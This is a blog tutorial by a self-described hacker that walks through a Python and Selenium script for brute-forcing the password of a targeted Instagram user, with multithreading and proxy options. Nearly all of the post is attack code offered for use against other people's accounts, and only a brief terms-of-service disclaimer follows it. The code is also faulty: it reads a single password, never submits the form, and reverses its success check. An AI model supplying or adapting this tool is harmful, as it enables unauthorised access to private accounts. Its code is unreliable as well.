How to Brute Force an Instagram Account with Python and Selenium 2023



 Hello Hy Namaste Salama Mera Naam Hai Gulshan Nagda.As we know that Instagram is a popular social media platform with millions of users worldwide. While Instagram has implemented robust security measures to protect its users' accounts, there are still instances where someone may try to access another person's account without their permission. In this blog post, we'll explore how to brute force an Instagram account using Python and Selenium.


What is an Instagram Bruteforce Attack?

 Instagram Bruteforce is an attack that an attacker performs on a specific USERNAME with thousands of passwords automated submitted to Instagram Login in hope that may be one of the passwords will be correct.

Brute force attacks involve systematically trying different username and password combinations until the correct combination is found. While brute force attacks can be time-consuming and resource-intensive, they can be effective if the attacker has access to a large number of passwords.


How we will be creating this tool?

We'll be using Python and Selenium to automate the login process and run a brute-force attack. Selenium is a popular testing tool that can be used to automate web browsers. With Selenium, we can interact with web pages, fill in forms, click buttons, and more.


VIDEO TUTORIAL:-

https://t.me/Tools_here/335



Now let's take a closer look at how this script works and what each part does:

Importing necessary libraries
#!/user/bin/python3
import threading
import time
import os 
import selenium 
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.proxy import Proxy, ProxyType
from selenium.webdriver.chrome.service import Service
from webdriver_manager.chrome import ChromeDriverManager

We begin by importing the necessary modules. We import threading to handle multi-threading, time to add delays, os to interact with the operating system, and selenium for browser automation. We also import several modules from Selenium, including the webdriver, options, exceptions, keys, and proxy.

Prompting the user for the target username

USERNAME = input("Type Your Target's Username: ")

We prompt the user to enter the target's username.

Reading the password from a text file

#function to read the password from a txt file
def read_password(file_path):
    with open(file_path) as p:
        password = p.read().strip()
        return password

Login function

#function to handle login process
def login(password, proxy):
  #configure the webdriver option to headless mode 
  chrome_options = Options()
  chrome_options.add_argument("--headless")

  #Setting up proxy 
  if proxy:
    chrome_options.add_argument('--proxy-server=%s' % proxy)

  #Create the webdriver
  driver = webdriver.Chrome(service=Service(executable_path=ChromeDriverManager().install()), options=chrome_options)


  try:
    driver.get("https://www.instagram.com/accounts/login/")
    time.sleep(2)

    #find the username and password fields and enter the values
    username_field = driver.find_element_by_name("username")
    password_field = driver.find_element_by_name("password")

    username_field.send_keys(USERNAME)
    password_field.send_keys(password)

    #find the login button and click it 
    login_button = driver.find_element_by_xpath("//button[@type='submit']")

    #check whether the login was succesful or not
    if driver.current_url == "https://www.instagram.com/accounts/login/":
      print(f'{USERNAME}:Login Succesful!')

      #Save the login information
      with open("login_info.txt", 'w+') as f:
        f.write(f'{USERNAME} and the {password}')
    else:
      print(f'{USERNAME} login failed!')

  except NoSuchElementException:
    print(f'{USERNAME}: Error - element not found!')

  except Exception as e:
    print(f'{USERNAME}: Error -{str(e)}')

  finally:
    #close the webdriver
    driver.quit()

The login function performs the actual login process. The function receives the password and the proxy as inputs, then configures the chrome_options object with the proxy configuration if it's provided. Then the function creates the Chrome driver instance with the specified options and proceeds to open the Instagram login page. The function then waits for two seconds and attempts to find the username and password fields on the page. It then inputs the values of the provided username and password and clicks the login button. If the login is successful, the function saves the login information to a file named login_info.txt. If the login fails, the function will print a message indicating that the login was unsuccessful.



Multithreading function


def run_thread(password, proxy):
    threads = []
    for i in range(10):
        thread = threading.Thread(target=login,args=(password, proxy))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

The run_thread function handles the multi-threading process. It creates 10 threads and starts each thread, calling the login function with the provided password and proxy. It then waits for all threads to complete before exiting.


Main Function of the Script

def main():
  #input from user for pass file location
  password_file_path = input("Enter The Location Of The file: ")

  #for proxy location
  use_proxy = input("Do You Want To Use Proxy?(y/n): ")
  proxy = None
  if use_proxy.lower() == 'y':
    proxy_location = input("Enter The Proxy Location: ")

    proxy = Proxy({
      'proxyType':
      ProxyType.MANUAL,
      'httpProxy':
      proxy_location,
      'ftpProxy':
      proxy_location,
      'sslProxy':
      proxy_location
    })

  #Read the password from the file
  password = read_password(password_file_path)

  #run threads
  run_thread(password, proxy)
Finally, the main function is called, which prompts the user to enter whether they want to use a proxy or not. If a proxy is desired, the user is prompted to enter the location of the proxy. The read_password function is then called to read the password from the file, and the run_thread function is called to start the login process on multiple threads.

if __name__ == "__main__":
  main()

Now We Will Call the main function.




Conclusion

Overall, this code provides a basic framework for logging into Instagram using Selenium and running the process on multiple threads for increased efficiency. However, it is important to note that automating the login process on Instagram is against their terms of service, and using this code could potentially result in your account being suspended or banned. It is always important to use web automation tools responsibly and ethically.


Contact Us Through :-) 

If You Are Facing Any Issues Please Response As In the Comment Section And Also Tell Us How Was Our Chapter 1 Of How Real Hackers Hack Smartphones It's Just A Small Method Don't Be Thinking That Real Hackers Hack Like This Only. I Just Shown The Simplest Methods and How They Hack As We Will Continue This series We Will Learn The Difficult and Working Methods So, Stay Tuned With Us We Will Bring More chapters On This Topic For now Try This One.

Instagram - gman_official01

YouTube - Problem Solutioner

E-Mail - solutionerproblem@gmail.com

Telegram - Hackers Community 



Post a Comment

Previous Post Next Post